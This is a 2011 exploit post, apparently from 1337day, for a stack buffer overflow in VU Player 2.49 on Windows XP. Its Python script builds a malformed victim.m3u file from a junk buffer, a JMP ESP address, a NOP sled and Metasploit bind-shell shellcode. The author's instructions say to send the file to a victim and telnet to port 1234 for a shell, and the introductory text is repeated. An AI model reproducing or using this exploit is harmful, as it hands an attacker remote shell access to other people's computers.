This is VU player stack buffer overflow exploit.This is a local exploit.
When you run this exploit a malformes .m3u file will be generated.
Change the shell code accroding to your purpose.
The shell code i have added is bad character free windows_shell_bind_tcp generated from metasploit frmae work.
If you use this shell code,After victim open the malformed m3u,you just have to telnet thr victim on port 1234 to get shell.
I have submitted the code @ injector vulnerability database
you can also find it @ http://1337day.com/exploits/16741
When you run this exploit a malformes .m3u file will be generated.
Change the shell code accroding to your purpose.
The shell code i have added is bad character free windows_shell_bind_tcp generated from metasploit frmae work.
If you use this shell code,After victim open the malformed m3u,you just have to telnet thr victim on port 1234 to get shell.
I have submitted the code @ injector vulnerability database
you can also find it @ http://1337day.com/exploits/16741
# Exploit Title: VU Player stack buffer overflow Local Exploit # Version: 2.49 # Date: 22-08-2011 # Author: Debasish Mandal http://www.facebook.com/raza.whitehat # Email debasishm89@gmail.com # Software Link: http://www.brothersoft.com/vuplayer-62979.html # Category:: Local # Tested on: Windows XP SP2. #!/usr/bin/python from struct import pack print "######################################################" print "## VU Player Local BO Exploit ##" print "## http://www.brothersoft.com/vuplayer-62979.html ##" print "## Author :: Debasish Mandal ##" print "## Email : debasishm89@gmail.com ##" print "## http://www.facebook.com/raza.whitehat ##" print "######################################################" raw_input("Press Enter to generate the crafted m3u...") f = open('victim.m3u','w') junk = "A"*1012 eip = pack('<L',0x77D7754A) # JMP ESP @ USER32.dll nop = "\x90" *10 # NOPs [To make the exploit smooth] #Shell Code Starts Here #List bad characters \x00 \x09 \x0a \x1a #Generated form Metasploit Framework #Name : windows/shell/bind_tcp #LPORT = 1234 shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1" "\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0" "\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12" "\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d" "\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99" "\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73" "\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d" "\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a" "\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7" "\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58" "\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2" "\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85" "\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb" "\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4" "\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a" "\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5" "\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b" "\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e" "\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b" "\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d" "\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d" "\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67") payload = (junk+eip+nop+shellcode) print "[*]Writinng payload to the file victim.m3u" f.write(payload) f.close() print "[*]Crafted .m3u File generated" print "[*]Now send the file to victim" print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u" print "[*]Exit" # 1337day.com [2011-08-22